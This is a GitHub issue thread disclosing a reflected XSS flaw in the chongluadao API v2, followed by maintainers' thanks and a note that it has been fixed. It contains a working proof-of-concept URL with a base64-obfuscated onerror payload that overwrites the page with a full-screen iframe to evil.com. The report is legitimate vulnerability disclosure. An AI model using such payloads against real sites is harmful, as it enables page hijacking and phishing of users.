### ISSUE TITLE
Reflected XSS

### ISSUE THREAD

**Issue by tienbip1337** [7zones/chongluadao-extension#39]
https://api.chongluadao.vn/v2/%3Cimg%20src=a%20onerror=eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPSdodHRwczovL2V2aWwuY29tJyB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjwvaWZyYW1lPiIp'))%3E

![image](https://user-images.githubusercontent.com/84076377/117964871-5af7ae80-b34c-11eb-8899-26f569cd71f9.png)

**Comment by dshongphuc** [comment]
Hi @tienbip1337, thank you so much for this contribution, we're fixing it :) 
If you have time, can you please do more pentest on the API v2? 

Thanks in advance!

**Comment by januaryofmine** [comment]
Thanks @tienbip1337, we done for XSS bug.
